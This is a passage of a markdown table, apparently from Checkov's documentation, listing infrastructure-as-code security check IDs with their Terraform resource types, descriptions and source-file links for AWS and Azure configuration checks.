[NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml) | +| 1186 | CKV2_AWS_59 | resource | aws_elasticsearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | +| 1187 | CKV2_AWS_59 | resource | aws_opensearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | +| 1188 | CKV2_AWS_60 | resource | aws_db_instance | Ensure RDS instance with copy tags to snapshots is enabled | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml) | +| 1189 | CKV2_AWS_61 | resource | aws_s3_bucket | Ensure that an S3 bucket has a lifecycle configuration | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml) | +| 1190 | CKV2_AWS_62 | resource | aws_s3_bucket | Ensure S3 buckets should have event notifications enabled | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml) | +| 1191 | CKV2_AWS_63 | resource | aws_networkfirewall_firewall | Ensure Network firewall has logging configuration defined | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml) | +| 1192 | CKV2_AWS_64 | resource | aws_kms_key | Ensure KMS key Policy is defined | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml) | +| 1193 | CKV2_AWS_65 | resource | aws_s3_bucket_ownership_controls | Ensure access control lists for S3 buckets are disabled | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml) | +| 1194 | CKV2_AWS_66 | resource | aws_mwaa_environment | Ensure MWAA environment is not publicly accessible | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml) | +| 1195 | CKV2_AWS_67 | resource | aws_kms_key | Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation | Terraform | [S3CMKRegularRotation.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml) | +| 1196 | CKV2_AWS_67 | resource | aws_s3_bucket | Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation | Terraform | [S3CMKRegularRotation.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml) | +| 1197 | CKV2_AWS_67 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure AWS S3 bucket encrypted with Customer Managed Key (CMK) has regular rotation | Terraform | [S3CMKRegularRotation.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3CMKRegularRotation.yaml) | +| 1198 | CKV2_AWS_68 | resource | aws_iam_role | Ensure SageMaker notebook instance IAM policy is not overly permissive | Terraform | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1199 | CKV2_AWS_68 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Terraform | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 1200 | CKV_AZURE_1 | resource | azurerm_linux_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | +| 1201 | CKV_AZURE_1 | resource | azurerm_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | +| 1202 | CKV_AZURE_2 | resource | azurerm_managed_disk | Ensure Azure managed disk has encryption enabled | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py) | +| 1203 | CKV_AZURE_3 | resource | azurerm_storage_account | Ensure that 'enable_https_traffic_only' is enabled | Terraform | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py) | +| 1204 | CKV_AZURE_4 | resource | azurerm_kubernetes_cluster | Ensure AKS logging to Azure Monitoring is Configured | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py) | +| 1205 | CKV_AZURE_5 | resource | azurerm_kubernetes_cluster | Ensure RBAC is enabled on AKS clusters | Terraform | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py) | +| 1206 | CKV_AZURE_6 | resource | azurerm_kubernetes_cluster | Ensure AKS has an API Server Authorized IP Ranges enabled | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py) | +| 1207 | CKV_AZURE_7 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Network Policy configured | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py) | +| 1208 | CKV_AZURE_8 | resource | azurerm_kubernetes_cluster | Ensure Kubernetes Dashboard is disabled | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py) | +| 1209 | CKV_AZURE_9 | resource | azurerm_network_security_group | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | +| 1210 | CKV_AZURE_9 | resource | azurerm_network_security_rule | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | +| 1211 | CKV_AZURE_10 | resource | azurerm_network_security_group | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | +| 1212 | CKV_AZURE_10 | resource | azurerm_network_security_rule | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | +| 1213 | CKV_AZURE_11 | resource | azurerm_mariadb_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1214 | CKV_AZURE_11 | resource | azurerm_mysql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1215 | CKV_AZURE_11 | resource | azurerm_postgresql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1216 | CKV_AZURE_11 | resource | azurerm_sql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1217 | CKV_AZURE_12 | resource | azurerm_network_watcher_flow_log | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py) | +| 1218 | CKV_AZURE_13 | resource | azurerm_app_service | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1219 | CKV_AZURE_13 | resource | azurerm_linux_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1220 | CKV_AZURE_13 | resource | azurerm_windows_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1221 | CKV_AZURE_14 | resource | azurerm_app_service | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1222 | CKV_AZURE_14 | resource | azurerm_linux_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1223 | CKV_AZURE_14 | resource | azurerm_windows_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1224 | CKV_AZURE_15 | resource | azurerm_app_service | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1225 | CKV_AZURE_15 | resource | azurerm_linux_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1226 | CKV_AZURE_15 | resource | azurerm_windows_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1227 | CKV_AZURE_16 | resource | azurerm_app_service | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1228 | CKV_AZURE_16 | resource | azurerm_linux_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1229 | CKV_AZURE_16 | resource | azurerm_windows_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1230 | CKV_AZURE_17 | resource | azurerm_app_service | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1231 | CKV_AZURE_17 | resource | azurerm_linux_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1232 | CKV_AZURE_17 | resource | azurerm_windows_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1233 | CKV_AZURE_18 | resource | azurerm_app_service | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1234 | CKV_AZURE_18 | resource | azurerm_linux_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1235 | CKV_AZURE_18 | resource | azurerm_windows_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1236 | CKV_AZURE_19 | resource | azurerm_security_center_subscription_pricing | Ensure that standard pricing tier is selected | Terraform | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py) | +| 1237 | CKV_AZURE_20 | resource | azurerm_security_center_contact | Ensure that security contact 'Phone number' is set | Terraform | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py) | +| 1238 | CKV_AZURE_21 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py) | +| 1239 | CKV_AZURE_22 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py) | +| 1240 | CKV_AZURE_23 | resource | azurerm_mssql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1241 | CKV_AZURE_23 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1242 | CKV_AZURE_23 | resource | azurerm_sql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1243 | CKV_AZURE_24 | resource | azurerm_mssql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1244 | CKV_AZURE_24 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1245 | CKV_AZURE_24 | resource | azurerm_sql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1246 | CKV_AZURE_25 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Threat Detection types' is set to 'All' | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py) | +| 1247 | CKV_AZURE_26 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py) | +| 1248 | CKV_AZURE_27 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py) | +| 1249 | CKV_AZURE_28 | resource | azurerm_mysql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Terraform | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py) | +| 1250 | CKV_AZURE_29 | resource | azurerm_postgresql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py) | +| 1251 | CKV_AZURE_30 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1252 | CKV_AZURE_31 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py) | +| 1253 | CKV_AZURE_32 | resource | azurerm_postgresql_configuration | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1254 | CKV_AZURE_33 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py) | +| 1255 | CKV_AZURE_34 | resource | azurerm_storage_container | Ensure that 'Public access level' is set to Private for blob containers | Terraform | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py) | +| 1256 | CKV_AZURE_35 | resource | azurerm_storage_account | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1257 | CKV_AZURE_35 | resource | azurerm_storage_account_network_rules | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1258 | CKV_AZURE_36 | resource | azurerm_storage_account | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1259 | CKV_AZURE_36 | resource | azurerm_storage_account_network_rules | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1260 | CKV_AZURE_37 | resource | azurerm_monitor_log_profile | Ensure that Activity Log Retention is set 365 days or greater | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py) | +| 1261 | CKV_AZURE_38 | resource | azurerm_monitor_log_profile | Ensure audit profile captures all the activities | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py) | +| 1262 | CKV_AZURE_39 | resource | azurerm_role_definition | Ensure that no custom subscription owner roles are created | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py) | +| 1263 | CKV_AZURE_40 | resource | azurerm_key_vault_key | Ensure that the expiration date is set on all keys | Terraform | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyExpirationDate.py) | +| 1264 | CKV_AZURE_41 | resource | azurerm_key_vault_secret | Ensure that the expiration date is set on all secrets | Terraform | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretExpirationDate.py) | +| 1265 | CKV_AZURE_42 | resource | azurerm_key_vault | Ensure the key vault is recoverable | Terraform | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyvaultRecoveryEnabled.py) | +| 1266 | CKV_AZURE_43 | resource | azurerm_storage_account | Ensure Storage Accounts adhere to the naming rules | Terraform | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountName.py) | +| 1267 | CKV_AZURE_44 | resource | azurerm_storage_account | Ensure Storage Account is using the latest version of TLS encryption | Terraform | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py) | +| 1268 | CKV_AZURE_45 | resource | azurerm_virtual_machine | Ensure that no sensitive credentials are exposed in VM custom_data | Terraform | [VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py) | +| 1269 | CKV_AZURE_47 | resource | azurerm_mariadb_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | Terraform | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBSSLEnforcementEnabled.py) | +| 1270 | CKV_AZURE_48 | resource | azurerm_mariadb_server | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | Terraform | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py) | +| 1271 | CKV_AZURE_49 | resource | azurerm_linux_virtual_machine_scale_set | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureScaleSetPassword.py) | +| 1272 | CKV_AZURE_50 | resource | azurerm_linux_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | +| 1273 | CKV_AZURE_50 | resource | azurerm_windows_virtual_machine | Ensure Virtual Machine Extensions are not Installed | Terraform | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py) | +| 1274 | CKV_AZURE_52 | resource | azurerm_mssql_server | Ensure MSSQL is using the latest version of TLS encryption | Terraform | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py) | +| 1275 | CKV_AZURE_53 | resource | azurerm_mysql_server | Ensure 'public network access enabled' is set to 'False' for mySQL servers | Terraform | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLPublicAccessDisabled.py) | +| 1276 | CKV_AZURE_54 | resource | azurerm_mysql_server | Ensure MySQL is using the latest version of TLS encryption | Terraform | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py) | +| 1277 | CKV_AZURE_55 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Servers | Terraform | [AzureDefenderOnServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnServers.py) | +| 1278 | CKV_AZURE_56 | resource | azurerm_function_app | Ensure that function apps enables Authentication | Terraform | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsEnableAuthentication.py) | +| 1279 | CKV_AZURE_57 | resource | azurerm_app_service | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1280 | CKV_AZURE_57 | resource | azurerm_linux_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1281 | CKV_AZURE_57 | resource | azurerm_windows_web_app | Ensure that CORS disallows every resource to access app services | Terraform | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDisallowCORS.py) | +| 1282 | CKV_AZURE_58 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces enables managed virtual networks | Terraform | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 1283 | CKV_AZURE_59 | resource | azurerm_storage_account | Ensure that Storage accounts disallow public access | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py) | +| 1284 | CKV_AZURE_61 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for App Service | Terraform | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py) | +| 1285 | CKV_AZURE_62 | resource | azurerm_function_app | Ensure function apps are not accessible from all regions | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py) | +| 1286 | CKV_AZURE_63 | resource | azurerm_app_service | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1287 | CKV_AZURE_63 | resource | azurerm_linux_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1288 | CKV_AZURE_63 | resource | azurerm_windows_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | +| 1289 | CKV_AZURE_64 | resource | azurerm_storage_sync | Ensure that Azure File Sync disables public network access | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py) | +| 1290 | CKV_AZURE_65 | resource | azurerm_app_service | Ensure that App service enables detailed error messages | Terraform | 